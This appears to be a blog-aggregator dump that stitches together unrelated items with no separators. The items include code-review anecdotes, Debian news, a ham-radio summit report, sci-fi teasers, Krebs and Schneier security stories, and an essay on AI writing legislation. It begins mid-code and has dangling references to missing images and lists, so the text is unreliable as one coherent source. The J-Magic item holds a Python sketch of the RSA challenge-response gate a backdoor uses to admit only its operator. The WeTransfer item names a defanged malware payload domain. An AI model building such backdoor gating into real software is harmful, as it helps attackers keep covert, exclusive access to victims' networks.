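    limit: Optional[Limit]  # None is the submitted way of saying "no limit"

def total_party_limit(note: Note, parties: list[Party]) -> float:
    # The new code branches on whether the note has a limit...
    if note.limit is None:
        return sum(p.limit.amount for p in parties)
    # ...but the note's limit was never part of the party calculation,
    # so both branches return exactly the same value. Elsewhere the code
    # already has an "unlimited" flag that skips limit checks entirely,
    # which would arguably be the cleaner representation.
    return sum(p.limit.amount for p in parties)
```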
Now, Steve wasn't let go only for their code; they were just a miserable co-worker who liked to pick fights in pull request comments. So the real highlight of Steve's dismissal was that Dallin got to have a meaningful discussion about the best way to make this change with the rest of the team, and Steve didn't have a chance to disrupt it.
Author: Julian Miles, Staff Writer …And so the seas rose again, while volcanos and storms brought even more devastation and starvation. Those godly ones who led us looked within themselves and made a decision: in their image was the world, and in their image it would be again. But until the disasters abated, they would […]
I was recently pointed to Technologies and Projects supported by the
Sovereign Tech Agency which is financed by the German Federal
Ministry for Economic Affairs and Climate Action. It is a subsidiary of
the Federal Agency for Disruptive Innovation, SPRIND GmbH.
It is worth sending applications there for distinct projects as that is
their preferred method of funding. Distinguished developers can also
apply for a fellowship position that pays up to 40hrs / week (32hrs when
freelancing) for a year. This is especially open to maintainers of larger
numbers of packages in Debian (or any other Linux distribution).
There might be a chance that some of the Debian-related projects
submitted to the Google Summer of Code that did not get funded could be
retried with those foundations. As per the FAQ of the project:
"The Sovereign Tech Agency focuses on securing and strengthening open
and foundational digital technologies. The communities working on
these are distributed all around the world, so we work with people,
companies, and FOSS communities everywhere."
Similar funding organizations include the Open Technology Fund and
FLOSS/fund. If you have a Debian-related project that fits these
funding programs, they might be interesting options. This list is by no
means exhaustive—just some hints I’ve received and wanted to share. More
suggestions for such opportunities are welcome.
Year of code reviews
On the debian-devel mailing list, there was a long thread titled
"Let's make 2025 a year when code reviews became common in Debian".
It initially suggested something along the lines of:
"Let's review MRs in Salsa." The discussion quickly expanded to
include patches that have
been sitting in the BTS for years, which deserve at least the same
attention. One idea I'd like to emphasize is that associating BTS bugs
with MRs could be very convenient. It’s not only helpful for
documentation but also the easiest way to apply patches.
I’d like to emphasize that no matter what workflow we use—BTS, MRs, or a
mix—it is crucial to uphold Debian’s reputation for high quality.
However, this reputation is at risk as more and more old issues
accumulate. While Debian is known for its technical excellence,
long-standing bugs and orphaned packages remain a challenge. If we don’t
address these, we risk weakening the high standards that Debian is
valued for. Revisiting old issues and ensuring that unmaintained
packages receive attention is especially important as we prepare for the
Trixie release.
Debian Publicity Team will no longer post on X/Twitter
The team is in charge of deciding the most suitable publication
venue or venues for announcements and when they are published.
The team once decided to join Twitter, but circumstances have since
changed. The current Press delegates have the institutional authority to
leave X, just as their predecessors had the authority to join. I
appreciate that the team carefully considered the matter, reinforced by
the arguments developed on the debian-publicity list, and communicated
its reasoning openly.
The RcppUUID package
on CRAN has been providing
UUIDs (based on the underlying Boost
library) for several years. Written by Artem Klemsov and maintained
in this gitlab
repo, the package is a very nice example of clean and
straightforward library binding.
When we did our annual
BH upgrade to 1.87.0 and checked reverse dependencies, we noticed that
RcppUUID
needed a small and rather minor update which we showed as a short diff
in an
issue filed. Neither I nor CRAN heard from Artem, so the
package ended up being archived last week, which in turn led me to
make this minimal update to 1.1.2 to resurrect it, which CRAN processed more or less like a
regular update given this explanation and so it arrived last Friday.
But you know what Canada could make? A Canadian App Store. That’s a store that Canadian software authors could use to sell Canadian apps to Canadian customers, charging, say, the standard payment processing fee of 5% rather than Apple’s 30%. Canada could make app stores for the Android, Playstation and Xbox, too.
There’s no reason that a Canadian app store would have to confine itself to Canadian software authors, either. Canadian app stores could offer 5% commissions on sales to US and global software authors, and provide jailbreaking kits that allow device owners all around the world to install the Canadian app stores where software authors don’t get ripped off by American Big Tech companies.
This was originally posted on SOTA
Forums.
It’s here for completeness of my writing.
To Quote @MM0EFI and the GM0ESS gang, today was a particularly Amateur showing!
Having spent all weekend locked in the curling rink ruining my knees and inflicting mild liver damage in the Aberdeen City Open competition, I needed some outside time away from people to stretch the legs and loosen my knees.
With my teammates/guests shipped off early on account of our quality performance and the days fair drawin’ out now, I found myself with a free afternoon to have a quick run up something nearby before a 1640 sunset! Up the back of Bennachie is a quick steady ascent and in 13 years of living up here I’ve never summited the big hill! Now is as good a time as any. In SOTA terms, this hill is GM/ES-061. In Geographical terms, it’s around 20 miles inland from Aberdeen city here.
I’ve been experimenting with these Aliexpress whips since the end of last year and the forecast wind was low enough to take one into the hills. I cut and terminated 8x 2.5m radials for an effective ground plane last week and wanted to try that against the flat ribbon that it came with.
The ascent was pleasant enough; I got to the summit in good time, and out came my Quansheng radio to get the GM/ES-Society on 2m. First up was my Nagoya whip: I called CQ and heard nothing, and with generally poor reports in WhatsApp I opted to get the slim-g up my aliexpress fibreglass mast.
In an amateur showing last week, I broke the tip of the mast in the wind on Cat Law while helping 2M0HSK do his first activation, and had forgotten this until I summited this week. Squeezing my antenna on was tough, and after many failed attempts to get it up (the mast kept collapsing as I was rushing and not getting the friction hold on each section correctly) and still not hearing anything at all, I changed location and tried again.
In my new position, I received 2M0RVZ 4/4 at best, but he was hearing my 5/9. Similarly GM5ALX and GM4JXP were patiently receiving me loud and clear but I couldn’t hear them at all. I fiddled with settings and decided the receive path of the Quansheng must be fried or sad somehow, but I don’t yet have a full set of diagnostics run.
I’ll take my Anytone on the next hill and compare them against each other I think.
I gave up and moved to HF, getting my whip and new radials into the ground:
Quick to deploy, which is what I was after. My new 5m of coax with a choke fitted attached to the radio and we were off to the races. A convenient thing of beauty when it’s up:
I’ve made a single guy with a sotabeams top insulator to brace against wind if need be, but that didn’t need to be used today.
I hit tune, and the G90 spent ages clicking away. In fact, tuning to 14.074, I could only see the famed FT8 signals at S2.
What could be wrong here? Was it my new radials? The whip has behaved before… Minutes turned into tens of minutes playing with everything, and eventually I worked out what was up: my coax only passed signal when I held the PL259 connector at the antenna juuuust right. Once I did that, I could take the tuner out of the system and work 20 spectacularly well. Until now, I’d been tuning the coax only.
Another Quality Hibby Build Job™️. That’s what’s wrong!
I managed to struggle my way through a touch of QRM and my wonky cable woes to make enough contacts with some very patient chasers and a summit to summit before my frustration at the situation won out, and down the hill I went after a quick pack up period. I managed to beat the sunset - I think if the system had worked fine, I’d have stayed on the hill for sunset.
I think it’s time for a new mast and a coax retermination!
Most of my Debian contributions this month were
sponsored by
Freexian. If you appreciate this sort of work and are at a company that
uses Debian, have a look to see whether you can pay for any of
Freexian‘s services; as well as the direct
benefits, that revenue stream helps to keep Debian development sustainable
for me and several other lovely
people.
You can also support my work directly via
Liberapay.
Python team
We finally made Python 3.13 the default version in testing! I fixed various
bugs that got in the way of this:
I helped with some testing of a debian-installer-utils
patch
as part of the /usr move. I need to get around to uploading this, since
it looks OK now.
Other small things
Helmut Grohne reached out for help debugging a multi-arch coinstallability
problem (you know it’s going to be complicated when even Helmut can’t
figure it out on his own …) in
binutils, and we had a call about that.
We analyzed every instance of AI use in elections collected by the WIRED AI Elections Project (source for our analysis), which tracked known uses of AI for creating political content during elections taking place in 2024 worldwide. In each case, we identified what AI was used for and estimated the cost of creating similar content without AI.
We find that (1) half of AI use isn’t deceptive, (2) deceptive content produced using AI is nevertheless cheap to replicate without AI, and (3) focusing on the demand for misinformation rather than the supply is a much more effective way to diagnose problems and identify interventions.
This tracks with my analysis. People share as a form of social signaling. I send you a meme/article/clipping/photo to show that we are on the same team. Whether it is true, or misinformation, or actual propaganda, is of secondary importance. Sometimes it’s completely irrelevant. This is why fact checking doesn’t work. This is why “cheap fakes”—obviously fake photos and videos—are effective. This is why, as the authors of that analysis said, the demand side is the real problem.
This is yet another story of commercial spyware being used against journalists and civil society members.
The journalists and other civil society members were being alerted of a possible breach of their devices, with WhatsApp telling the Guardian it had “high confidence” that the 90 users in question had been targeted and “possibly compromised.”
It is not clear who was behind the attack. Like other spyware makers, Paragon’s hacking software is used by government clients and WhatsApp said it had not been able to identify the clients who ordered the alleged attacks.
Experts said the targeting was a “zero-click” attack, which means targets would not have had to click on any malicious links to be infected.
Author: Neille Williams “Gramps, a star just fell out of the sky!” Billie hollered out to her Grandpa, who had just poured his second whiskey and was reclining against the kitchen bench. “Sweetie,” he began, ambling over as she pressed her eager face against the window glass, “stars don’t just fall out of the sky, […]
A newly discovered VPN backdoor uses some interesting tactics to avoid detection:
When threat actors use backdoor malware to gain access to a network, they want to make sure all their hard work can’t be leveraged by competing groups or detected by defenders. One countermeasure is to equip the backdoor with a passive agent that remains dormant until it receives what’s known in the business as a “magic packet.” On Thursday, researchers revealed that a never-before-seen backdoor that quietly took hold of dozens of enterprise VPNs running Juniper Network’s Junos OS has been doing just that.
J-Magic, the tracking name for the backdoor, goes one step further to prevent unauthorized access. After receiving a magic packet hidden in the normal flow of TCP traffic, it relays a challenge to the device that sent it. The challenge comes in the form of a string of text that’s encrypted using the public portion of an RSA key. The initiating party must then respond with the corresponding plaintext, proving it has access to the secret key.
The lightweight backdoor is also notable because it resided only in memory, a trait that makes detection harder for defenders. The combination prompted researchers at Lumen Technology’s Black Lotus Lab to sit up and take notice.
[…]
The researchers found J-Magic on VirusTotal and determined that it had run inside the networks of 36 organizations. They still don’t know how the backdoor got installed.
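The gatekeeping step described in the excerpt is essentially RSA used as a proof of key possession: the backdoor encrypts a random challenge to its operator's public key, and only someone holding the matching private key can send back the plaintext. A rough sketch of that kind of handshake, using Python's cryptography package, is below; it illustrates the general technique only and is not J-Magic's actual code or wire format.

```python
# Rough sketch of an RSA challenge-response proof of key possession.
# Illustration of the general technique only, not J-Magic's implementation.
import os
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import rsa, padding

oaep = padding.OAEP(mgf=padding.MGF1(algorithm=hashes.SHA256()),
                    algorithm=hashes.SHA256(), label=None)

# The operator holds the private key; the implant ships only the public half.
operator_key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
implant_pubkey = operator_key.public_key()

# Implant side: after spotting a "magic packet", encrypt a random challenge.
challenge = os.urandom(32)
ciphertext = implant_pubkey.encrypt(challenge, oaep)

# Operator side: only the private-key holder can recover the plaintext.
response = operator_key.decrypt(ciphertext, oaep)

# Implant side: open the backdoor only if the response matches the challenge.
assert response == challenge
```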
Author: R. J. Erbacher Admiring what lay outside the glass, the vastness of space overwhelmed him. The window on the spacious observation deck was a circular aluminosilicate pane, a meter in circumference, the handles on both sides allowed him to effortlessly hold his prone body suspended in the zero-gravity environment. He didn’t like to come […]
The FBI and authorities in The Netherlands this week seized dozens of servers and domains for a hugely popular spam and malware dissemination service operating out of Pakistan. The proprietors of the service, who use the collective nickname “The Manipulaters,” have been the subject of three stories published here since 2015. The FBI said the main clientele are organized crime groups that try to trick victim companies into making payments to a third party.
One of several current Fudtools sites run by the principals of The Manipulaters.
On January 29, the FBI and the Dutch national police seized the technical infrastructure for a cybercrime service marketed under the brands Heartsender, Fudpage and Fudtools (and many other “fud” variations). The “fud” bit stands for “Fully Un-Detectable,” and it refers to cybercrime resources that will evade detection by security tools like antivirus software or anti-spam appliances.
The Dutch authorities said 39 servers and domains abroad were seized, and that the servers contained millions of records from victims worldwide — including at least 100,000 records pertaining to Dutch citizens.
A statement from the U.S. Department of Justice refers to the cybercrime group as Saim Raza, after a pseudonym The Manipulaters communally used to promote their spam, malware and phishing services on social media.
“The Saim Raza-run websites operated as marketplaces that advertised and facilitated the sale of tools such as phishing kits, scam pages and email extractors often used to build and maintain fraud operations,” the DOJ explained.
The core Manipulaters product is Heartsender, a spam delivery service whose homepage openly advertised phishing kits targeting users of various Internet companies, including Microsoft 365, Yahoo, AOL, Intuit, iCloud and ID.me, to name a few.
The government says transnational organized crime groups that purchased these services primarily used them to run business email compromise (BEC) schemes, wherein the cybercrime actors tricked victim companies into making payments to a third party.
“Those payments would instead be redirected to a financial account the perpetrators controlled, resulting in significant losses to victims,” the DOJ wrote. “These tools were also used to acquire victim user credentials and utilize those credentials to further these fraudulent schemes. The seizure of these domains is intended to disrupt the ongoing activity of these groups and stop the proliferation of these tools within the cybercriminal community.”
Manipulaters advertisement for “Office 365 Private Page with Antibot” phishing kit sold via Heartsender. “Antibot” refers to functionality that attempts to evade automated detection techniques, keeping a phish deployed and accessible as long as possible. Image: DomainTools.
KrebsOnSecurity first wrote about The Manipulaters in May 2015, mainly because their ads at the time were blanketing a number of popular cybercrime forums, and because they were fairly open and brazen about what they were doing — even who they were in real life.
We caught up with The Manipulaters again in 2021, with a story that found the core employees had started a web coding company in Lahore called WeCodeSolutions — presumably as a way to account for their considerable Heartsender income. That piece examined how WeCodeSolutions employees had all doxed themselves on Facebook by posting pictures from company parties each year featuring a large cake with the words FudCo written in icing.
A follow-up story last year about The Manipulaters prompted messages from various WeCodeSolutions employees who pleaded with this publication to remove stories about them. The Saim Raza identity told KrebsOnSecurity they were recently released from jail after being arrested and charged by local police, although they declined to elaborate on the charges.
The Manipulaters never seemed to care much about protecting their own identities, so it’s not surprising that they were unable or unwilling to protect their own customers. In an analysis released last year, DomainTools.com found the web-hosted version of Heartsender leaked an extraordinary amount of user information to unauthenticated users, including customer credentials and email records from Heartsender employees.
Almost every year since their founding, The Manipulaters have posted a picture of a FudCo cake from a company party celebrating its anniversary.
DomainTools also uncovered evidence that the computers used by The Manipulaters were all infected with the same password-stealing malware, and that vast numbers of credentials were stolen from the group and sold online.
“Ironically, the Manipulaters may create more short-term risk to their own customers than law enforcement,” DomainTools wrote. “The data table ‘User Feedbacks’ (sic) exposes what appear to be customer authentication tokens, user identifiers, and even a customer support request that exposes root-level SMTP credentials–all visible by an unauthenticated user on a Manipulaters-controlled domain.”
Police in The Netherlands said the investigation into the owners and customers of the service is ongoing.
“The Cybercrime Team is on the trail of a number of buyers of the tools,” the Dutch national police said. “Presumably, these buyers also include Dutch nationals. The investigation into the makers and buyers of this phishing software has not yet been completed with the seizure of the servers and domains.”
U.S. authorities this week also joined law enforcement in Australia, France, Greece, Italy, Romania and Spain in seizing a number of domains for several long-running cybercrime forums and services, including Cracked and Nulled. According to a statement from the European police agency Europol, the two communities attracted more than 10 million users in total.
Other domains seized as part of “Operation Talent” included Sellix, an e-commerce platform that was frequently used by cybercrime forum members to buy and sell illicit goods and services.
Decreasingly hungry thrillseeker
Weaponized Fun
has second thoughts about the risk to which they're willing to expose their palate.
"In addition to Budget Bytes mailing list not knowing who I am, I'm not sure they know what they're making. I'm having a hard time telling whether 'New Recipe 1' sounds more enticing than 'New Recipe 3.' I sure hope they remembered the ingredients."
An anonymous reader frets that
"The Guardian claims an article is *more* than 7 years old (it's not, as of today, January 26)"
Date math is hard.
"Oh snap!" cried
The Beast in Black
I feel like we've seen several errors like this from Firefox recently: problems with 0 and -1 as sentinel values.
Faithful contributor
Michael R.
doubled up on the FB follies this week; here's one. Says Michael
"Those hard tech interviews at META really draw in the best talent."
Finally for this week, a confused
Stewart
found an increasingly rare type of classic Error'd.
"Trying to figure out how to ignore as instructed, when there is no ignore option. Do I just ignore it?"
For completeness, the options should also include Abort.
Author: Dart Humeston “Two popular restaurants were closed yesterday while the city health department warned four others.” Tisha, the television news anchor said, her luscious blonde hair framing her stunning face. “This despite the city cutting the health department’s budget by 60%,” said Brad, Tisha’s co-anchor. His jet-black hair was short on the sides, but […]
In an effort to blend in and make their malicious traffic tougher to block, hosting firms catering to cybercriminals in China and Russia increasingly are funneling their operations through major U.S. cloud providers. Research published this week on one such outfit — a sprawling network tied to Chinese organized crime gangs and aptly named “Funnull” — highlights a persistent whac-a-mole problem facing cloud services.
In October 2024, the security firm Silent Push published a lengthy analysis of how Amazon AWS and Microsoft Azure were providing services to Funnull, a two-year-old Chinese content delivery network that hosts a wide variety of fake trading apps, pig butchering scams, gambling websites, and retail phishing pages.
Funnull made headlines last summer after it acquired the domain name polyfill[.]io, previously the home of a widely-used open source code library that allowed older browsers to handle advanced functions that weren’t natively supported. There were still tens of thousands of legitimate domains linking to the Polyfill domain at the time of its acquisition, and Funnull soon after conducted a supply-chain attack that redirected visitors to malicious sites.
Silent Push’s October 2024 report found a vast number of domains hosted via Funnull promoting gambling sites that bear the logo of the Suncity Group, a Chinese entity named in a 2024 UN report (PDF) for laundering millions of dollars for the North Korean Lazarus Group.
It is likely the gambling sites coming through Funnull are abusing top casino brands as part of their money laundering schemes. In reporting on Silent Push’s October report, TechCrunch obtained a comment from Bwin, one of the casinos being advertised en masse through Funnull, and Bwin said those websites did not belong to them.
Gambling is illegal in China except in Macau, a special administrative region of China. Silent Push researchers say Funnull may be helping online gamblers in China evade the Communist party’s “Great Firewall,” which blocks access to gambling destinations.
Silent Push’s Zach Edwards said that upon revisiting Funnull’s infrastructure again this month, they found dozens of the same Amazon and Microsoft cloud Internet addresses still forwarding Funnull traffic through a dizzying chain of auto-generated domain names before redirecting visitors to malicious or phishous websites.
Edwards said Funnull is a textbook example of an increasing trend Silent Push calls “infrastructure laundering,” wherein crooks selling cybercrime services will relay some or all of their malicious traffic through U.S. cloud providers.
“It’s crucial for global hosting companies based in the West to wake up to the fact that extremely low quality and suspicious web hosts based out of China are deliberately renting IP space from multiple companies and then mapping those IPs to their criminal client websites,” Edwards told KrebsOnSecurity. “We need these major hosts to create internal policies so that if they are renting IP space to one entity, who further rents it to host numerous criminal websites, all of those IPs should be reclaimed and the CDN who purchased them should be banned from future IP rentals or purchases.”
A Suncity gambling site promoted via Funnull. The sites feature a prompt for a Tether/USDT deposit program.
Reached for comment, Amazon referred this reporter to a statement Silent Push included in a report released today. Amazon said AWS was already aware of the Funnull addresses tracked by Silent Push, and that it had suspended all known accounts linked to the activity.
Amazon said that contrary to implications in the Silent Push report, it has every reason to aggressively police its network against this activity, noting the accounts tied to Funnull used “fraudulent methods to temporarily acquire infrastructure, for which it never pays. Thus, AWS incurs damages as a result of the abusive activity.”
“When AWS’s automated or manual systems detect potential abuse, or when we receive reports of potential abuse, we act quickly to investigate and take action to stop any prohibited activity,” Amazon’s statement continues. “In the event anyone suspects that AWS resources are being used for abusive activity, we encourage them to report it to AWS Trust & Safety using the report abuse form. In this case, the authors of the report never notified AWS of the findings of their research via our easy-to-find security and abuse reporting channels. Instead, AWS first learned of their research from a journalist to whom the researchers had provided a draft.”
Microsoft likewise said it takes such abuse seriously, and encouraged others to report suspicious activity found on its network.
“We are committed to protecting our customers against this kind of activity and actively enforce acceptable use policies when violations are detected,” Microsoft said in a written statement. “We encourage reporting suspicious activity to Microsoft so we can investigate and take appropriate actions.”
Richard Hummel is threat intelligence lead at NETSCOUT. Hummel said it used to be that “noisy” and frequently disruptive malicious traffic — such as automated application layer attacks, and “brute force” efforts to crack passwords or find vulnerabilities in websites — came mostly from botnets, or large collections of hacked devices.
But he said the vast majority of the infrastructure used to funnel this type of traffic is now proxied through major cloud providers, which can make it difficult for organizations to block at the network level.
“From a defenders point of view, you can’t wholesale block cloud providers, because a single IP can host thousands or tens of thousands of domains,” Hummel said.
In May 2024, KrebsOnSecurity published a deep dive on Stark Industries Solutions, an ISP that materialized at the start of Russia’s invasion of Ukraine and has been used as a global proxy network that conceals the true source of cyberattacks and disinformation campaigns against enemies of Russia. Experts said much of the malicious traffic traversing Stark’s network (e.g. vulnerability scanning and password brute force attacks) was being bounced through U.S.-based cloud providers.
Stark’s network has been a favorite of the Russian hacktivist group called NoName057(16), which frequently launches huge distributed denial-of-service (DDoS) attacks against a variety of targets seen as opposed to Moscow. Hummel said NoName’s history suggests they are adept at cycling through new cloud provider accounts, making anti-abuse efforts into a game of whac-a-mole.
“It almost doesn’t matter if the cloud provider is on point and takes it down because the bad guys will just spin up a new one,” he said. “Even if they’re only able to use it for an hour, they’ve already done their damage. It’s a really difficult problem.”
Edwards said Amazon declined to specify whether the banned Funnull users were operating using compromised accounts or stolen payment card data, or something else.
“I’m surprised they wanted to lean into ‘We’ve caught this 1,200+ times and have taken these down!’ and yet didn’t connect that each of those IPs was mapped to [the same] Chinese CDN,” he said. “We’re just thankful Amazon confirmed that account mules are being used for this and it isn’t some front-door relationship. We haven’t heard the same thing from Microsoft but it’s very likely that the same thing is happening.”
Funnull wasn’t always a bulletproof hosting network for scam sites. Prior to 2022, the network was known as Anjie CDN, based in the Philippines. One of Anjie’s properties was a website called funnull[.]app. Loading that domain reveals a pop-up message by the original Anjie CDN owner, who said their operations had been seized by an entity known as Fangneng CDN and ACB Group, the parent company of Funnull.
A machine-translated message from the former owner of Anjie CDN, a Chinese content delivery network that is now Funnull.
“After I got into trouble, the company was managed by my family,” the message explains. “Because my family was isolated and helpless, they were persuaded by villains to sell the company. Recently, many companies have contacted my family and threatened them, believing that Fangneng CDN used penetration and mirroring technology through customer domain names to steal member information and financial transactions, and stole customer programs by renting and selling servers. This matter has nothing to do with me and my family. Please contact Fangneng CDN to resolve it.”
In January 2024, the U.S. Department of Commerce issued a proposed rule that would require cloud providers to create a “Customer Identification Program” that includes procedures to collect data sufficient to determine whether each potential customer is a foreign or U.S. person.
According to the law firm Crowell & Moring LLP, the Commerce rule also would require “infrastructure as a service” (IaaS) providers to report knowledge of any transactions with foreign persons that might allow the foreign entity to train a large AI model with potential capabilities that could be used in malicious cyber-enabled activity.
“The proposed rulemaking has garnered global attention, as its cross-border data collection requirements are unprecedented in the cloud computing space,” Crowell wrote. “To the extent the U.S. alone imposes these requirements, there is concern that U.S. IaaS providers could face a competitive disadvantage, as U.S. allies have not yet announced similar foreign customer identification requirements.”
It remains unclear if the new White House administration will push forward with the requirements. The Commerce action was mandated as part of an executive order President Trump issued a day before leaving office in January 2021.
There are thousands of fake Reddit and WeTransfer webpages that are pushing malware. They exploit people who are using search engines to search sites like Reddit.
Unsuspecting victims clicking on the link are taken to a fake WeTransfer site that mimics the interface of the popular file-sharing service. The ‘Download’ button leads to the Lumma Stealer payload hosted on “weighcobbweo[.]top.”
I'm a JSON curmudgeon, in that I think that its type system, inherited from JavaScript, is bad. It's a limited vocabulary of types, and it forces developers to play odd games of convention. For example, because it lacks any sort of date type, you either have to explode your date out as a sub-dictionary (arguably, the "right" approach) or do what most people do: use an ISO formatted string as your date. The latter version requires you to attempt to parse the string to validate the data, but validating JSON is a whole thing anyway.
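As a small illustration of that parsing burden, the receiver of a payload like the made-up one below has to round-trip the string through a date parser before it knows whether the "date" is a date at all:

```python
# JSON has no date type, so an ISO-formatted string has to be parsed
# before you know whether the "date" field is valid. Payload is made up.
import json
from datetime import date

payload = json.loads('{"invoice": 42, "due": "2025-02-30"}')

try:
    due = date.fromisoformat(payload["due"])
except ValueError:
    # "2025-02-30" is a perfectly good string, but February has no 30th.
    raise SystemExit("invalid due date: " + payload["due"])
```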
But, enough about me being old and cranky. Do you know one type JSON supports? Boolean values.
Which is why this specification from today's anonymous submitter annoys me so much:
Their custom validator absolutely requires the use of strings, and absolutely requires that they have these values. Sending a boolean, or worse, the string "true" causes the request to get rejected.
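The specification itself isn't reproduced here, but the behaviour described amounts to something like the sketch below; the accepted strings and the error messages are stand-ins, not the real values from the spec.

```python
# Sketch of a validator that demands specific strings instead of booleans.
# The accepted values and error messages are placeholders, not the spec.
ACCEPTED = {"Y", "N"}

def validate_flag(value):
    # A real JSON boolean is rejected outright...
    if isinstance(value, bool):
        raise ValueError("flag must be a string, not a boolean")
    # ...and so is any string outside the blessed set, including "true".
    if value not in ACCEPTED:
        raise ValueError("flag must be one of: " + ", ".join(sorted(ACCEPTED)))
    return value == "Y"
```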
Our submitter doesn't explain why it's this way, but I have a strong suspicion that it's because it was originally designed to support a form submission with radio buttons. The form is long gone, but the API contract remains.
Author: Tamiko Bronson “How will they find us, Grandma?” She smiled, pulling her paintbrush across each rice paper lantern. Velvet black ink seeped into the fibers, revealing names: Tsuneo. Kazuko. Satoshi. Our ancestors. “Come, Kana-chan.” We carried the lanterns to the garden. One by one, we lined the path. “The lights will guide them.” I […]
Author: Alastair Millar “It’s quite impressive, really,” said Annika, leaning back in her chair. As General Overseer at Europe’s busiest spaceport, she’d worked hard to get where she was, and could afford to be relaxed. “It’s bloody annoying, is what it is,” retorted Hans. As a Senior Processing Officer, he tended to find himself at […]
Today's anonymous submitter spent a few weeks feeling pretty good about themselves. You see, they'd inherited a gigantic and complex pile of code, an application spread out across 15 backend servers, theoretically organized into "modules" and "microservices" but in reality a big ball of mud. And after a long and arduous process, they'd dug through that ball of mud and managed to delete 190 files, totaling 30,000 lines of code. That was fully 2/3rds of the total codebase, gone, and yet the tests continued to pass, the application continued to run, and everyone was just much happier with it.
Two weeks later, a new ticket comes in: users are getting a 403 error when trying to access the "User Update" screen. Our submitter has seen a lot of these tickets, and it almost always means that the user's permissions are misconfigured. It's an easy fix, and not a code problem.
Just to be on the safe side, though, they pull up the screen with their account, guaranteed to have the right permissions, and get a 403.
As you can imagine, the temptation to sneak a few fixes in alongside this massive refactoring was impossible to resist. One of the problems was that most of their routes were camelCase URLs, but userupdate was not. So they'd fixed it. It was a minor change, and it worked in testing. So what was happening?
Well, there was a legacy authorization database. It was one of those 15 backend servers, and it ran no web code, and thus wasn't touched by our submitter's refactoring. Despite their web layer having copious authorization and authentication code, someone had decided, back in the olden days, to implement that authorization and authentication in its own database.
Not every request went through this database. It impacted new sessions, but only under specific conditions. But this database had a table in it, which listed off all the routes. And unlike the web code, which used case-insensitive regular expressions to check routes, this database did a strict equality comparison.
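The mismatch is easy to picture. Here is a tiny sketch of the two checks side by side, where the patterns and the table contents are made up apart from the userUpdate/userupdate pair:

```python
# Made-up sketch of the two route checks: the web layer matches routes
# case-insensitively, while the legacy auth table uses strict equality.
import re

def web_layer_allows(path: str) -> bool:
    # The web code used case-insensitive regular expressions for routes.
    return re.fullmatch(r"/user(update|profile)", path, re.IGNORECASE) is not None

LEGACY_AUTH_ROUTES = {"/userupdate", "/userProfile"}  # contents hypothetical

def legacy_db_allows(path: str) -> bool:
    # The legacy authorization database compared route strings exactly.
    return path in LEGACY_AUTH_ROUTES

print(web_layer_allows("/userUpdate"))  # True: the regex ignores case
print(legacy_db_allows("/userUpdate"))  # False: strict equality fails -> 403
```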
The fix was simple: update the table to allow userUpdate. But it also pointed towards a deeper, meaner target for future refactoring: dealing with this sometimes required (but often not!) authentication step lurking in a database that no one had thought about until our submitter's refactoring broke something.
Artificial intelligence (AI) is writing law today. This has required no changes in legislative procedure or the rules of legislative bodies—all it takes is one legislator, or legislative assistant, to use generative AI in the process of drafting a bill.
In fact, the use of AI by legislators is only likely to become more prevalent. There are currently projects in the US House, US Senate, and legislatures around the world to trial the use of AI in various ways: searching databases, drafting text, summarizing meetings, performing policy research and analysis, and more. A Brazilian municipality passed the first known AI-written law in 2023.
That’s not surprising; AI is being used more everywhere. What is coming into focus is how policymakers will use AI and, critically, how this use will change the balance of power between the legislative and executive branches of government. Soon, US legislators may turn to AI to help them keep pace with the increasing complexity of their lawmaking—and this will suppress the power and discretion of the executive branch to make policy.
Demand for Increasingly Complex Legislation
Legislators are writing increasingly long, intricate, and complicated laws that human legislative drafters have trouble producing. Already in the US, the multibillion-dollar lobbying industry is subsidizing lawmakers in writing baroque laws: suggesting paragraphs to add to bills, specifying benefits for some, carving out exceptions for others. Indeed, the lobbying industry is growing in complexity and influence worldwide.
Several years ago, researchers studied bills introduced into state legislatures throughout the US, looking at which bills were wholly original texts and which borrowed text from other states or from lobbyist-written model legislation. Their conclusion was not very surprising. Those who borrowed the most text were in legislatures that were less resourced. This makes sense: If you’re a part-time legislator, perhaps unpaid and without a lot of staff, you need to rely on more external support to draft legislation. When the scope of policymaking outstrips the resources of legislators, they look for help. Today, that often means lobbyists, who provide expertise, research services, and drafting labor to legislators at the local, state, and federal levels at no charge. Of course, they are not unbiased: They seek to exert influence on behalf of their clients.
Another study, at the US federal level, measured the complexity of policies proposed in legislation and tried to determine the factors that led to such growing complexity. While there are numerous ways to measure legal complexity, these authors focused on the specificity of institutional design: How exacting is Congress in laying out the relational network of branches, agencies, and officials that will share power to implement the policy?
In looking at bills enacted between 1993 and 2014, the researchers found two things. First, they concluded that ideological polarization drives complexity. The suggestion is that if a legislator is on the extreme end of the ideological spectrum, they’re more likely to introduce a complex law that constrains the discretion of, as the authors put it, “entrenched bureaucratic interests.” And second, they found that divided government drives complexity to a large degree: Significant legislation passed under divided government was found to be 65 percent more complex than similar legislation passed under unified government. Their conclusion is that, if a legislator’s party controls Congress, and the opposing party controls the White House, the legislator will want to give the executive as little wiggle room as possible. When legislators’ preferences disagree with the executive’s, the legislature is incentivized to write laws that specify all the details. This gives the agency designated to implement the law as little discretion as possible.
Because polarization and divided government are increasingly entrenched in the US, the demand for complex legislation at the federal level is likely to grow. Today, we have both the greatest ideological polarization in Congress in living memory and an increasingly divided government at the federal level. Between 1900 and 1970 (57th through 90th Congresses), we had 27 instances of unified government and only seven divided; nearly a four-to-one ratio. Since then, the trend is roughly the opposite. As of the start of the next Congress, we will have had 20 divided governments and only eight unified (nearly a three-to-one ratio). And while the incoming Trump administration will see a unified government, the extremely closely divided House may often make this Congress look and feel like a divided one (see the recent government shutdown crisis as an exemplar) and makes truly divided government a strong possibility in 2027.
Another related factor driving the complexity of legislation is the need to do it all at once. The lobbyist feeding frenzy—spurring major bills like the Affordable Care Act to be thousands of pages in length—is driven in part by gridlock in Congress. Congressional productivity has dropped so low that bills on any given policy issue seem like a once-in-a-generation opportunity for legislators—and lobbyists—to set policy.
These dynamics also impact the states. States often have divided governments, albeit less often than they used to, and their demand for drafting assistance is arguably higher due to their significantly smaller staffs. And since the productivity of Congress has cratered in recent years, significantly more policymaking is happening at the state level.
